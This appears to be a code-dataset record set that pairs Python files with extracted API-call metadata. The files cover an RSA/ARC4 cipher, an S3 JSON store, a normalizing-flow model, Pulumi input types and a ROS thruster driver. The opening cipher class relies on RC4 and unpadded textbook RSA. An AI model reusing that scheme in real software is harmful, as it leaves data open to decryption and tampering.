def decrypt(self, c):
res = pow(c, self.d, self.N)
return binascii.unhexlify(str(res))
class Cipher(SimpleRSA):
def __init__(self, params):
self.p = params['p']
self.q = params['q']
self.N = params['N']
self.phi = params['phi']
self.e = params['e']
self.d = params['d']
def decrypt_request(self, tmpkey, message):
k = self.decrypt(tmpkey)
message = arc4_decrypt(k, message)
return message
def encrypt_response(self, user_key, message):
tmpkey = token_hex(nbytes=10)
other_key = (user_key['user_key']['N'], user_key['user_key']['e'])
enc_key = self.encrypt(tmpkey, other_key)
cipher = arc4_encrypt(tmpkey, message)
return dict(
key=enc_key,
data=str(base64.b64encode(cipher))[2:-1]
)
if __name__ == "__main__":
pass | [
"base64.b64encode",
"secrets.token_hex",
"rsa.prime.getprime",
"arc4.ARC4"
] | [((435, 444), 'arc4.ARC4', 'ARC4', (['key'], {}), '(key)\n', (439, 444), False, 'from arc4 import ARC4\n'), ((541, 550), 'arc4.ARC4', 'ARC4', (['key'], {}), '(key)\n', (545, 550), False, 'from arc4 import ARC4\n'), ((2082, 2102), 'secrets.token_hex', 'token_hex', ([], {'nbytes': '(10)'}), '(nbytes=10)\n', (2091, 2102), False, 'from secrets import token_hex\n'), ((717, 743), 'rsa.prime.getprime', 'prime.getprime', (['bit_length'], {}), '(bit_length)\n', (731, 743), False, 'from rsa import prime\n'), ((760, 786), 'rsa.prime.getprime', 'prime.getprime', (['bit_length'], {}), '(bit_length)\n', (774, 786), False, 'from rsa import prime\n'), ((2342, 2366), 'base64.b64encode', 'base64.b64encode', (['cipher'], {}), '(cipher)\n', (2358, 2366), False, 'import base64\n')] |
# Copyright © 2020 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
"""Implementation persistence store using S3."""
import logging
from rudra.data_store.aws import AmazonS3
from src.config.settings import SETTINGS, AWS_SETTINGS
logger = logging.getLogger(__name__)
class PersistenceStore:
"""Persistence store to save Bigquery Data, it uses AWS S3 as of now as data store."""
def __init__(self, s3_client=None):
"""Initialize DataProcessing object."""
self.s3_client = s3_client
if s3_client:
self.s3_client = s3_client
else:
self.s3_client = AmazonS3(
region_name=AWS_SETTINGS.s3_region,
bucket_name=AWS_SETTINGS.s3_bucket_name,
aws_access_key_id=AWS_SETTINGS.s3_access_key_id,
aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key,
local_dev=not SETTINGS.use_cloud_services
)
def update(self, data, bucket_name, filename='collated.json'):
"""Upload s3 bucket."""
# connect after creating or with existing s3 client
self.s3_client.connect()
if not self.s3_client.is_connected():
raise Exception('Unable to connect to s3.')
json_data = dict()
if self.s3_client.object_exists(filename):
logger.info('%s exists, updating it.', filename)
json_data = self.s3_client.read_json_file(filename)
if not json_data:
raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}')
json_data.update(data)
self.s3_client.write_json_file(filename, json_data)
logger.info('Updated file Succefully!')
| [
"rudra.data_store.aws.AmazonS3",
"logging.getLogger"
] | [((780, 807), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (797, 807), False, 'import logging\n'), ((1153, 1400), 'rudra.data_store.aws.AmazonS3', 'AmazonS3', ([], {'region_name': 'AWS_SETTINGS.s3_region', 'bucket_name': 'AWS_SETTINGS.s3_bucket_name', 'aws_access_key_id': 'AWS_SETTINGS.s3_access_key_id', 'aws_secret_access_key': 'AWS_SETTINGS.s3_secret_access_key', 'local_dev': '(not SETTINGS.use_cloud_services)'}), '(region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.\n s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id,\n aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not\n SETTINGS.use_cloud_services)\n', (1161, 1400), False, 'from rudra.data_store.aws import AmazonS3\n')] |
import torch
import torch.nn as nn
import torchvision.transforms as T
from .MADE import MADE
from .Shuffle import Shuffle
from .Flow import SequentialConditionalFlow
from .NormFunctions import ActNorm, RunningBatchNorm1d
from utils.logger import log
class MAF(nn.Module):
def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device):
super(MAF, self).__init__()
self.flow_dim = flow_dim
self.condition_dim = condition_dim
self.hidden_dim = hidden_dim
self.device = device
self.model = SequentialConditionalFlow(sum(
[[MADE(flow_dim, condition_dim, hidden_dim, ind == 0),
RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \
for ind in range(num_blocks - 1)] \
+ [[MADE(flow_dim, condition_dim, hidden_dim, False)]],
[]))
self.model.to(device)
self.prior = torch.distributions.Normal(torch.tensor(0., device=device),
torch.tensor(1., device=device))
self.initialized = True
def calc_loss(self, inputs, conditions):
raise NotImplementedError
def forward_flow(self, inputs, conditions):
in_shape = inputs.shape
inputs = inputs.reshape(-1, self.flow_dim)
conditions = conditions.reshape(inputs.shape[0], self.condition_dim)
if not self.initialized and inputs.shape[0] != 1: # hack todo fix?
with torch.no_grad():
self.model.data_init(inputs, conditions)
self.initialized = True
z, logjac = self.model.forward_flow(inputs, conditions)
return z.reshape(in_shape), logjac.reshape(in_shape[:-1])
def sample(self, conditions):
batch_size = conditions.shape[0]
with torch.no_grad():
z = self.prior.sample([batch_size, self.flow_dim])
x, _ = self.model.inverse_flow(z, conditions)
return x
def save(self, path):
torch.save({
"model": self.model.state_dict(),
"optimizer": self.optimizer.state_dict(),
}, path)
def load(self, path):
state_dict = torch.load(path, map_location=self.device)
self.model.load_state_dict(state_dict["model"])
self.optimizer.load_state_dict(state_dict["optimizer"])
"""
uniform noise to dequantize input
logit(a + (1 - 2a) * image) as in paper
"""
class MAFImageTransform():
def __init__(self, dataset):
if dataset == "mnist":
self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()])
self.alpha = 0.01
else:
raise AttributeError("Unknown dataset")
def __call__(self, image):
image = self.base_transform(image)
noise = (torch.rand_like(image) - 0.5) * (1/256.)
image = (image + noise).clip(0., 1.)
return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)
| [
"torch.logit",
"torchvision.transforms.RandomHorizontalFlip",
"torch.load",
"torch.rand_like",
"torch.randperm",
"torch.no_grad",
"torch.tensor",
"torchvision.transforms.ToTensor"
] | [((2173, 2215), 'torch.load', 'torch.load', (['path'], {'map_location': 'self.device'}), '(path, map_location=self.device)\n', (2183, 2215), False, 'import torch\n'), ((2895, 2949), 'torch.logit', 'torch.logit', (['(self.alpha + (1 - 2 * self.alpha) * image)'], {}), '(self.alpha + (1 - 2 * self.alpha) * image)\n', (2906, 2949), False, 'import torch\n'), ((967, 999), 'torch.tensor', 'torch.tensor', (['(0.0)'], {'device': 'device'}), '(0.0, device=device)\n', (979, 999), False, 'import torch\n'), ((1016, 1048), 'torch.tensor', 'torch.tensor', (['(1.0)'], {'device': 'device'}), '(1.0, device=device)\n', (1028, 1048), False, 'import torch\n'), ((1804, 1819), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1817, 1819), False, 'import torch\n'), ((1465, 1480), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1478, 1480), False, 'import torch\n'), ((2794, 2816), 'torch.rand_like', 'torch.rand_like', (['image'], {}), '(image)\n', (2809, 2816), False, 'import torch\n'), ((2564, 2576), 'torchvision.transforms.ToTensor', 'T.ToTensor', ([], {}), '()\n', (2574, 2576), True, 'import torchvision.transforms as T\n'), ((2578, 2602), 'torchvision.transforms.RandomHorizontalFlip', 'T.RandomHorizontalFlip', ([], {}), '()\n', (2600, 2602), True, 'import torchvision.transforms as T\n'), ((726, 750), 'torch.randperm', 'torch.randperm', (['flow_dim'], {}), '(flow_dim)\n', (740, 750), False, 'import torch\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'MappingMappingArgs',
]
@pulumi.input_type
class MappingMappingArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
id: pulumi.Input[str],
push_status: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "id", id)
if push_status is not None:
pulumi.set(__self__, "push_status", push_status)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="pushStatus")
def push_status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "push_status")
@push_status.setter
def push_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "push_status", value)
| [
"pulumi.get",
"pulumi.getter",
"pulumi.set"
] | [((1281, 1313), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""pushStatus"""'}), "(name='pushStatus')\n", (1294, 1313), False, 'import pulumi\n'), ((620, 666), 'pulumi.set', 'pulumi.set', (['__self__', '"""expression"""', 'expression'], {}), "(__self__, 'expression', expression)\n", (630, 666), False, 'import pulumi\n'), ((675, 705), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (685, 705), False, 'import pulumi\n'), ((899, 929), 'pulumi.get', 'pulumi.get', (['self', '"""expression"""'], {}), "(self, 'expression')\n", (909, 929), False, 'import pulumi\n'), ((1014, 1051), 'pulumi.set', 'pulumi.set', (['self', '"""expression"""', 'value'], {}), "(self, 'expression', value)\n", (1024, 1051), False, 'import pulumi\n'), ((1140, 1162), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (1150, 1162), False, 'import pulumi\n'), ((1231, 1260), 'pulumi.set', 'pulumi.set', (['self', '"""id"""', 'value'], {}), "(self, 'id', value)\n", (1241, 1260), False, 'import pulumi\n'), ((1387, 1418), 'pulumi.get', 'pulumi.get', (['self', '"""push_status"""'], {}), "(self, 'push_status')\n", (1397, 1418), False, 'import pulumi\n'), ((1515, 1553), 'pulumi.set', 'pulumi.set', (['self', '"""push_status"""', 'value'], {}), "(self, 'push_status', value)\n", (1525, 1553), False, 'import pulumi\n'), ((754, 802), 'pulumi.set', 'pulumi.set', (['__self__', '"""push_status"""', 'push_status'], {}), "(__self__, 'push_status', push_status)\n", (764, 802), False, 'import pulumi\n')] |
#!/usr/bin/env python
import numpy as np
import copy
import rospy
import rospkg
import rosparam
import threading
import argparse
from geometry_msgs.msg import Vector3
from std_msgs.msg import Header, Float64
from sub8_msgs.msg import Thrust, ThrusterStatus
from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point
from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster
from sub8_thruster_comm import thruster_comm_factory
from ros_alarms import AlarmBroadcaster, AlarmListener
lock = threading.Lock()
class BusVoltageMonitor(object):
'''
Class that estimates sub8's thruster bus voltage.
As of May 2017, this is just a simple rolling average with a constant width sliding
window. However add_reading and get_estimate methods are left for when smarter
filtering is needed
'''
VMAX = 50 # volts
VMIN = 0 # volts
class VoltageReading(object):
def __init__(self, voltage, time):
self.v = voltage
self.t = time
def __init__(self, window_duration):
'''
window_duration - float (amount of seconds for which to keep a reading in the buffer)
'''
self.bus_voltage_alarm = AlarmBroadcaster("bus-voltage")
self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)
self.warn_voltage = rospy.get_param("/battery/warn_voltage", 44.5)
self.kill_voltage = rospy.get_param("/battery/kill_voltage", 44.0)
self.last_estimate_time = rospy.Time.now()
self.WINDOW_DURATION = rospy.Duration(window_duration)
self.ESTIMATION_PERIOD = rospy.Duration(0.2)
self.cached_severity = 0
self.buffer = []
def add_reading(self, voltage, time):
''' Adds voltage readings to buffer '''
voltage = float(voltage)
# Only add if it makes sense (the M5's will give nonsense feedback at times)
if voltage >= self.VMIN and voltage <= self.VMAX:
self.buffer.append(self.VoltageReading(voltage, time))
self.prune_buffer()
# check bus voltage if enough time has passed
if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:
self.check_bus_voltage()
def prune_buffer(self):
''' Removes readings older than the window_duration from buffer '''
for reading in self.buffer:
age = rospy.Time.now() - reading.t
if age > self.WINDOW_DURATION:
self.buffer.remove(reading)
def get_voltage_estimate(self):
''' Returns average voltage in buffer '''
voltages = []
if len(self.buffer) == 0:
return None
for r in self.buffer:
voltages.append(r.v)
return np.mean(voltages)
def check_bus_voltage(self):
''' Publishes bus_voltage estimate and raises alarm if necessary '''
bus_voltage = self.get_voltage_estimate()
if bus_voltage is None:
return
self.bus_voltage_pub.publish(Float64(bus_voltage))
severity = None
if bus_voltage < self.warn_voltage:
severity = 3
if bus_voltage < self.kill_voltage:
severity = 5
if severity is not None and self.cached_severity != severity:
self.bus_voltage_alarm.raise_alarm(
problem_description='Bus voltage has fallen to {}'.format(bus_voltage),
parameters={'bus_voltage': bus_voltage},
severity=severity
)
self.cached_severity = severity
class ThrusterDriver(object):
_dropped_timeout = 1.0 # s
_window_duration = 30.0 # s
_NODE_NAME = rospy.get_name()
def __init__(self, ports_layout, thruster_definitions):
'''Thruster driver, an object for commanding all of the sub's thrusters
- Gather configuration data and make it available to other nodes
- Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters
- Track a thrust_dict, which maps thruster names to the appropriate port
- Given a command message, route that command to the appropriate port/thruster
- Send a thruster status message describing the status of the particular thruster
'''
self.failed_thrusters = set() # This is only determined by comms
self.deactivated_thrusters = set() # These will not come back online even if comms are good (user managed)
# Alarms
self.thruster_out_alarm = AlarmBroadcaster("thruster-out")
AlarmListener("thruster-out", self.check_alarm_status, call_when_raised=False) # Prevent outside interference
# Create ThrusterPort objects in a dict indexed by port name
self.load_thruster_ports(ports_layout, thruster_definitions)
# Feedback on thrusters (thruster mapper blocks until it can use this service)
self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)
self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10)
for name in self.thruster_to_port_map.keys()}
# These alarms require this service to be available before things will work
rospy.wait_for_service("update_thruster_layout")
self.update_thruster_out_alarm()
# Bus voltage
self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration)
# Command thrusters
self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)
# To programmatically deactivate thrusters
self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster)
self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster)
@thread_lock(lock)
def load_thruster_ports(self, ports_layout, thruster_definitions):
''' Loads a dictionary ThrusterPort objects '''
self.ports = {} # ThrusterPort objects
self.thruster_to_port_map = {} # node_id to ThrusterPort
rospack = rospkg.RosPack()
self.make_fake = rospy.get_param('simulate', False)
if self.make_fake:
rospy.logwarn("Running fake thrusters for simulation, based on parameter '/simulate'")
# Instantiate thruster comms port
for port_info in ports_layout:
port_name = port_info['port']
self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake)
# Add the thrusters to the thruster dict and configure if present
for thruster_name in port_info['thruster_names']:
self.thruster_to_port_map[thruster_name] = port_info['port']
if thruster_name not in self.ports[port_name].online_thruster_names:
rospy.logerr("ThrusterDriver: {} IS MISSING!".format(thruster_name))
else:
rospy.loginfo("ThrusterDriver: {} registered".format(thruster_name))
# Set firmware settings
port = self.ports[port_name]
node_id = thruster_definitions[thruster_name]['node_id']
config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' +
thruster_name + '.yaml')
rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name,
config_path))
port.set_registers_from_dict(node_id=node_id,
reg_dict=rosparam.load_file(config_path)[0][0])
port.reboot_thruster(node_id) # Necessary for some settings to take effect
def get_thruster_info(self, srv):
''' Get the thruster info for a particular thruster name '''
query_name = srv.thruster_name
info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name]
thruster_info = ThrusterInfoResponse(
node_id=info.node_id,
min_force=info.thrust_bounds[0],
max_force=info.thrust_bounds[1],
position=numpy_to_point(info.position),
direction=Vector3(*info.direction)
)
return thruster_info
def check_alarm_status(self, alarm):
# If someone else cleared this alarm, we need to make sure to raise it again
if not alarm.raised and alarm.node_name != self._NODE_NAME:
self.update_thruster_out_alarm()
def update_thruster_out_alarm(self):
'''
Raises or clears the thruster out alarm
Updates the 'offline_thruster_names' parameter accordingly
Sets the severity to the number of failed thrusters (clipped at 5)
'''
offline_names = list(self.failed_thrusters)
if len(self.failed_thrusters) > 0:
self.thruster_out_alarm.raise_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names},
severity=int(np.clip(len(self.failed_thrusters), 1, 5)))
else:
self.thruster_out_alarm.clear_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names})
@thread_lock(lock)
def command_thruster(self, name, thrust):
'''
Issue a a force command (in Newtons) to a named thruster
Example names are BLR, FLH, etc.
Raises RuntimeError if a thrust value outside of the configured thrust bounds is commanded
Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust
'''
port_name = self.thruster_to_port_map[name]
target_port = self.ports[port_name]
thruster_model = target_port.thruster_info[name]
if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]:
rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format(
thrust, thruster_model.thrust_bounds))
if name in self.failed_thrusters:
if not np.isclose(thrust, 0):
rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')')
effort = target_port.thruster_info[name].get_effort_from_thrust(thrust)
# We immediately get thruster_status back
thruster_status = target_port.command_thruster(name, effort)
# Keep track of thrusters going online or offline
offline_on_port = target_port.get_offline_thruster_names()
for offline in offline_on_port:
if offline not in self.failed_thrusters:
self.failed_thrusters.add(offline) # Thruster went offline
for failed in copy.deepcopy(self.failed_thrusters):
if (failed in target_port.get_declared_thruster_names() and
failed not in offline_on_port and
failed not in self.deactivated_thrusters):
self.failed_thrusters.remove(failed) # Thruster came online
# Don't try to do anything if the thruster status is bad
if thruster_status is None:
return
message_contents = [
'rpm',
'bus_v',
'bus_i',
'temp',
'fault',
'command_tx_count',
'status_rx_count',
'command_latency_avg'
]
message_keyword_args = {key: thruster_status[key] for key in message_contents}
power = thruster_status['bus_v'] * thruster_status['bus_i']
self.status_publishers[name].publish(
ThrusterStatus(
header=Header(stamp=rospy.Time.now()),
name=name,
node_id=thruster_model.node_id,
power=power,
effort=effort,
thrust=thrust,
**message_keyword_args
)
)
# Will publish bus_voltage and raise alarm if necessary
self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now())
# Undervolt/overvolt faults are unreliable (might not still be true - David)
if message_keyword_args['fault'] > 2:
fault_codes = {
(1 << 0): 'UNDERVOLT',
(1 << 1): 'OVERRVOLT',
(1 << 2): 'OVERCURRENT',
(1 << 3): 'OVERTEMP',
(1 << 4): 'STALL',
(1 << 5): 'STALL_WARN',
}
fault = int(message_keyword_args['fault'])
faults = []
for code, fault_name in fault_codes.items():
if code & fault != 0:
faults.append(fault_name)
rospy.logwarn("Thruster: {} has entered fault with status {}".format(name, message_keyword_args))
rospy.logwarn("Fault causes are: {}".format(faults))
return
def thrust_cb(self, msg):
'''
Callback for receiving thrust commands
These messages contain a list of instructions, one for each thruster
If there are any updates to the list of failed thrusters, it will raise and alarm
'''
failed_before = {x for x in self.failed_thrusters}
for thrust_cmd in list(msg.thruster_commands):
self.command_thruster(thrust_cmd.name, thrust_cmd.thrust)
# Raise or clear 'thruster-out' alarm
if not self.failed_thrusters == failed_before:
rospy.logdebug('Failed thrusters:', self.failed_thrusters)
self.update_thruster_out_alarm()
def stop(self):
''' Commands 0 thrust to all thrusters '''
for port in self.ports.values():
for thruster_name in port.online_thruster_names.copy():
self.command_thruster(thruster_name, 0.0)
def fail_thruster(self, srv):
''' Makes a thruster unavailable for thrust allocation '''
# So that thrust is not allocated to the thruster
self.failed_thrusters.add(srv.thruster_name)
# So that it won't come back online even if comms are good
self.deactivated_thrusters.add(srv.thruster_name)
# So that thruster_mapper updates the B-matrix
self.update_thruster_out_alarm()
return {}
def unfail_thruster(self, srv):
''' Undoes effect of self.fail_thruster '''
self.failed_thrusters.remove(srv.thruster_name)
self.deactivated_thrusters.remove(srv.thruster_name)
self.update_thruster_out_alarm()
return {}
if __name__ == '__main__':
PKG = 'sub8_videoray_m5_thruster'
usage_msg = "Interface to Sub8's VideoRay M5 thrusters"
desc_msg = "Specify a path to the configuration.json file containing the thrust calibration data"
parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg)
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node('videoray_m5_thruster_driver')
layout_parameter = '/thruster_layout'
rospy.loginfo("Thruster Driver waiting for parameter, {}".format(layout_parameter))
thruster_layout = wait_for_param(layout_parameter)
if thruster_layout is None:
raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver')
thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters'])
rospy.spin()
| [
"geometry_msgs.msg.Vector3",
"rosparam.load_file",
"rospy.Subscriber",
"argparse.ArgumentParser",
"mil_ros_tools.thread_lock",
"std_msgs.msg.Float64",
"numpy.mean",
"numpy.isclose",
"rospy.get_name",
"mil_ros_tools.numpy_to_point",
"ros_alarms.AlarmBroadcaster",
"rospy.Duration",
"rospy.logwarn",
"mil_ros_tools.wait_for_param",
"rospy.Time.now",
"threading.Lock",
"rospy.init_node",
"rospy.wait_for_service",
"copy.deepcopy",
"rospy.logdebug",
"sub8_thruster_comm.thruster_comm_factory",
"rospy.Service",
"ros_alarms.AlarmListener",
"rospkg.RosPack",
"rospy.Publisher",
"rospy.get_param",
"rospy.spin",
"rospy.myargv"
] | [((533, 549), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (547, 549), False, 'import threading\n'), ((3696, 3712), 'rospy.get_name', 'rospy.get_name', ([], {}), '()\n', (3710, 3712), False, 'import rospy\n'), ((5932, 5949), 'mil_ros_tools.thread_lock', 'thread_lock', (['lock'], {}), '(lock)\n', (5943, 5949), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((9489, 9506), 'mil_ros_tools.thread_lock', 'thread_lock', (['lock'], {}), '(lock)\n', (9500, 9506), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((15046, 15108), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'usage': 'usage_msg', 'description': 'desc_msg'}), '(usage=usage_msg, description=desc_msg)\n', (15069, 15108), False, 'import argparse\n'), ((15163, 15209), 'rospy.init_node', 'rospy.init_node', (['"""videoray_m5_thruster_driver"""'], {}), "('videoray_m5_thruster_driver')\n", (15178, 15209), False, 'import rospy\n'), ((15363, 15395), 'mil_ros_tools.wait_for_param', 'wait_for_param', (['layout_parameter'], {}), '(layout_parameter)\n', (15377, 15395), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((15639, 15651), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (15649, 15651), False, 'import rospy\n'), ((1222, 1253), 'ros_alarms.AlarmBroadcaster', 'AlarmBroadcaster', (['"""bus-voltage"""'], {}), "('bus-voltage')\n", (1238, 1253), False, 'from ros_alarms import AlarmBroadcaster, AlarmListener\n'), ((1285, 1338), 'rospy.Publisher', 'rospy.Publisher', (['"""bus_voltage"""', 'Float64'], {'queue_size': '(1)'}), "('bus_voltage', Float64, queue_size=1)\n", (1300, 1338), False, 'import rospy\n'), ((1367, 1413), 'rospy.get_param', 'rospy.get_param', (['"""/battery/warn_voltage"""', '(44.5)'], {}), "('/battery/warn_voltage', 44.5)\n", (1382, 1413), False, 'import rospy\n'), ((1442, 1488), 'rospy.get_param', 'rospy.get_param', (['"""/battery/kill_voltage"""', '(44.0)'], {}), "('/battery/kill_voltage', 44.0)\n", (1457, 1488), False, 'import rospy\n'), ((1523, 1539), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (1537, 1539), False, 'import rospy\n'), ((1571, 1602), 'rospy.Duration', 'rospy.Duration', (['window_duration'], {}), '(window_duration)\n', (1585, 1602), False, 'import rospy\n'), ((1636, 1655), 'rospy.Duration', 'rospy.Duration', (['(0.2)'], {}), '(0.2)\n', (1650, 1655), False, 'import rospy\n'), ((2773, 2790), 'numpy.mean', 'np.mean', (['voltages'], {}), '(voltages)\n', (2780, 2790), True, 'import numpy as np\n'), ((4562, 4594), 'ros_alarms.AlarmBroadcaster', 'AlarmBroadcaster', (['"""thruster-out"""'], {}), "('thruster-out')\n", (4578, 4594), False, 'from ros_alarms import AlarmBroadcaster, AlarmListener\n'), ((4603, 4681), 'ros_alarms.AlarmListener', 'AlarmListener', (['"""thruster-out"""', 'self.check_alarm_status'], {'call_when_raised': '(False)'}), "('thruster-out', self.check_alarm_status, call_when_raised=False)\n", (4616, 4681), False, 'from ros_alarms import AlarmBroadcaster, AlarmListener\n'), ((4978, 5056), 'rospy.Service', 'rospy.Service', (['"""thrusters/thruster_info"""', 'ThrusterInfo', 'self.get_thruster_info'], {}), "('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)\n", (4991, 5056), False, 'import rospy\n'), ((5345, 5393), 'rospy.wait_for_service', 'rospy.wait_for_service', (['"""update_thruster_layout"""'], {}), "('update_thruster_layout')\n", (5367, 5393), False, 'import rospy\n'), ((5589, 5663), 'rospy.Subscriber', 'rospy.Subscriber', (['"""thrusters/thrust"""', 'Thrust', 'self.thrust_cb'], {'queue_size': '(1)'}), "('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)\n", (5605, 5663), False, 'import rospy\n'), ((5752, 5816), 'rospy.Service', 'rospy.Service', (['"""fail_thruster"""', 'FailThruster', 'self.fail_thruster'], {}), "('fail_thruster', FailThruster, self.fail_thruster)\n", (5765, 5816), False, 'import rospy\n'), ((5855, 5925), 'rospy.Service', 'rospy.Service', (['"""unfail_thruster"""', 'UnfailThruster', 'self.unfail_thruster'], {}), "('unfail_thruster', UnfailThruster, self.unfail_thruster)\n", (5868, 5925), False, 'import rospy\n'), ((6234, 6250), 'rospkg.RosPack', 'rospkg.RosPack', ([], {}), '()\n', (6248, 6250), False, 'import rospkg\n'), ((6277, 6311), 'rospy.get_param', 'rospy.get_param', (['"""simulate"""', '(False)'], {}), "('simulate', False)\n", (6292, 6311), False, 'import rospy\n'), ((11021, 11057), 'copy.deepcopy', 'copy.deepcopy', (['self.failed_thrusters'], {}), '(self.failed_thrusters)\n', (11034, 11057), False, 'import copy\n'), ((3041, 3061), 'std_msgs.msg.Float64', 'Float64', (['bus_voltage'], {}), '(bus_voltage)\n', (3048, 3061), False, 'from std_msgs.msg import Header, Float64\n'), ((5097, 5171), 'rospy.Publisher', 'rospy.Publisher', (["('thrusters/status/' + name)", 'ThrusterStatus'], {'queue_size': '(10)'}), "('thrusters/status/' + name, ThrusterStatus, queue_size=10)\n", (5112, 5171), False, 'import rospy\n'), ((6351, 6442), 'rospy.logwarn', 'rospy.logwarn', (['"""Running fake thrusters for simulation, based on parameter \'/simulate\'"""'], {}), '(\n "Running fake thrusters for simulation, based on parameter \'/simulate\'")\n', (6364, 6442), False, 'import rospy\n'), ((6598, 6673), 'sub8_thruster_comm.thruster_comm_factory', 'thruster_comm_factory', (['port_info', 'thruster_definitions'], {'fake': 'self.make_fake'}), '(port_info, thruster_definitions, fake=self.make_fake)\n', (6619, 6673), False, 'from sub8_thruster_comm import thruster_comm_factory\n'), ((12340, 12356), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (12354, 12356), False, 'import rospy\n'), ((13742, 13800), 'rospy.logdebug', 'rospy.logdebug', (['"""Failed thrusters:"""', 'self.failed_thrusters'], {}), "('Failed thrusters:', self.failed_thrusters)\n", (13756, 13800), False, 'import rospy\n'), ((15138, 15152), 'rospy.myargv', 'rospy.myargv', ([], {}), '()\n', (15150, 15152), False, 'import rospy\n'), ((2147, 2163), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (2161, 2163), False, 'import rospy\n'), ((2412, 2428), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (2426, 2428), False, 'import rospy\n'), ((8364, 8393), 'mil_ros_tools.numpy_to_point', 'numpy_to_point', (['info.position'], {}), '(info.position)\n', (8378, 8393), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((8417, 8441), 'geometry_msgs.msg.Vector3', 'Vector3', (['*info.direction'], {}), '(*info.direction)\n', (8424, 8441), False, 'from geometry_msgs.msg import Vector3\n'), ((10363, 10384), 'numpy.isclose', 'np.isclose', (['thrust', '(0)'], {}), '(thrust, 0)\n', (10373, 10384), True, 'import numpy as np\n'), ((10402, 10505), 'rospy.logwarn', 'rospy.logwarn', (["('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name +\n ')')"], {}), "(\n 'ThrusterDriver: commanding non-zero thrust to offline thruster (' +\n name + ')')\n", (10415, 10505), False, 'import rospy\n'), ((11951, 11967), 'rospy.Time.now', 'rospy.Time.now', ([], 